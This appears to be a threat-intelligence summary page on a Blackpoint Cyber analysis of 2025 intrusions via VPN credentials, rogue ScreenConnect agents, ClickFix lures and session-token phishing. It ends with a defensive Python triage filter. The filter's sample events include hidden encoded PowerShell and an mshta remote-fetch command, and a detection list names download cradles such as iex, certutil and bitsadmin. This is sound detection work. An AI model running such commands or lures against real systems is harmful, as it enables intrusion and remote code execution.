

Increased exploitation of legitimate remote access pathways and trusted tools in 2025 intrusions according to Blackpoint Cyber threat analysis

1 unique source, 1 article

Summary


A 2026 analysis of 2025 incident response cases by Blackpoint Cyber finds threat actors increasingly leveraging legitimate remote access pathways and trusted administrative tools to establish initial access and maintain persistence. Rather than relying on software vulnerabilities, attackers primarily abused valid credentials, SSL VPN sessions, and remote monitoring and management (RMM) tools such as ScreenConnect to blend into normal operations. In cloud environments, adversaries captured and reused authenticated session tokens following successful multi-factor authentication (MFA) via adversary-in-the-middle phishing, bypassing detection by appearing as legitimate sessions.

Timeline

  1. 01.04.2026 17:05 1 article · 1h ago

    Legitimate access pathways and trusted tools identified as primary intrusion vectors in 2025 incident analysis

    Analysis of 2025 incident response cases by Blackpoint Cyber highlights that threat actors increasingly gain initial access via legitimate remote access methods, including SSL VPN sessions authenticated with compromised credentials (32.8% of cases) and rogue RMM tools such as ScreenConnect (30.3% of cases). Social engineering campaigns using deceptive prompts accounted for 57.5% of incidents, while adversary-in-the-middle phishing captured authenticated session tokens post-MFA in approximately 16% of cloud compromises, enabling undetected reuse of legitimate sessions.


Information Snippets

  • Remote access pathways and trusted administrative tools were the primary initial access vectors in analyzed intrusions, exceeding exploitation of software vulnerabilities.

    First reported: 01.04.2026 17:05
    1 source, 1 article
  • SSL VPN abuse accounted for 32.8% of identifiable incidents, with threat actors authenticating using compromised credentials to establish seemingly legitimate VPN sessions.

  • RMM tool abuse occurred in 30.3% of identifiable incidents, with ScreenConnect present in over 70% of rogue RMM cases, often indistinguishable from legitimate administrative activity.

  • Fake CAPTCHA and ClickFix-style social engineering campaigns drove 57.5% of all identifiable incidents by tricking users into executing commands via the Windows Run dialog using built-in tools.

  • Adversary-in-the-Middle phishing captured authenticated session tokens post-MFA in approximately 16% of cloud account compromise cases, enabling session reuse without bypassing authentication.

  • Investigated incidents spanned multiple sectors including manufacturing, healthcare, MSPs, financial services, and construction, indicating broad applicability of observed intrusion patterns.

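Two of the snippets above (Run-dialog ClickFix lures and rogue RMM agents such as ScreenConnect) describe activity that looks like ordinary administration in raw telemetry, so the practical question for a defender is what to triage on. The following is an added example, not code from Blackpoint Cyber or from this site: a small filter over Windows process-creation events that flags shell interpreters spawned by explorer.exe with lure-style command lines, and RMM agent binaries on hosts where no IT-owned agent is expected. The event records, the indicator patterns, the approved-host list and the agent binary names are assumptions constructed for the example.

```python
"""Triage filter for two intrusion patterns: ClickFix-style execution from the
Run dialog and unapproved RMM agents. Added example with constructed data."""
import re
from dataclasses import dataclass

# Constructed sample events shaped like the fields a Windows Security 4688 or
# Sysmon Event ID 1 record carries (parent image, image, command line).
# The base64 blob is a truncated, constructed placeholder, not a real payload.
SAMPLE_EVENTS = [
    {"host": "WS-101", "user": "alice", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "WS-102", "user": "bob", "parent": "explorer.exe",
     "image": "mshta.exe", "cmdline": "mshta https://example.invalid/verify.hta"},
    {"host": "WS-103", "user": "carol", "parent": "code.exe",
     "image": "powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File build.ps1"},
    {"host": "SRV-01", "user": "svc-rmm", "parent": "services.exe",
     "image": "ScreenConnect.ClientService.exe", "cmdline": "(service start)"},
    {"host": "WS-104", "user": "dave", "parent": "explorer.exe",
     "image": "ScreenConnect.ClientService.exe", "cmdline": "(user launch)"},
    {"host": "WS-105", "user": "erin", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe"},
]

# The Run dialog is hosted by the shell, so a paste-and-run lure shows up as
# explorer.exe spawning one of these interpreters (assumed set for this example).
SHELL_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                      "wscript.exe", "cscript.exe"}

# Command-line traits typical of a lure: encoded or hidden PowerShell, a remote
# payload URL, or an in-memory download cradle. Tune to your own baseline.
CLICKFIX_INDICATORS = [
    ("encoded command", re.compile(r"(?i)-e(nc(odedcommand)?)?\b")),
    ("hidden window", re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b")),
    ("remote url", re.compile(r"(?i)https?://")),
    ("download cradle",
     re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|certutil|curl|bitsadmin)\b")),
]

# Assumed agent binary names for the RMM product named in the report, and a
# constructed list of hosts where the IT-owned agent is expected to run.
RMM_AGENT_IMAGES = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
APPROVED_RMM_HOSTS = {"SRV-01"}


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    detail: str


def clickfix_indicators(event):
    """Names of lure indicators present when explorer.exe spawns a shell; [] otherwise."""
    if event["parent"].lower() != "explorer.exe":
        return []
    if event["image"].lower() not in SHELL_INTERPRETERS:
        return []
    return [name for name, rx in CLICKFIX_INDICATORS if rx.search(event["cmdline"])]


def is_rogue_rmm(event):
    """True when a known RMM agent binary runs on a host with no approved agent."""
    return (event["image"].lower() in RMM_AGENT_IMAGES
            and event["host"] not in APPROVED_RMM_HOSTS)


def triage(events):
    """Apply both rules to every event and return the findings in input order."""
    findings = []
    for ev in events:
        hits = clickfix_indicators(ev)
        if hits:
            findings.append(Finding(ev["host"], ev["user"],
                                    "clickfix-run-dialog", ", ".join(hits)))
        if is_rogue_rmm(ev):
            findings.append(Finding(ev["host"], ev["user"],
                                    "unapproved-rmm-agent", ev["image"]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host:8} {f.user:8} {f.rule:22} {f.detail}")
```

On the constructed sample this flags WS-101 and WS-102 as Run-dialog lures and WS-104 for an RMM agent outside the approved set, while leaving the developer on WS-103, the plain interactive shell on WS-105 and the IT-managed agent on SRV-01 alone. The ClickFix rule deliberately requires both the explorer.exe parent and at least one command-line indicator, because explorer.exe also parents every Start-menu launch; the RMM rule is an allowlist rather than a blocklist, which is what makes a tool that is "indistinguishable from legitimate administrative activity" tractable to alert on.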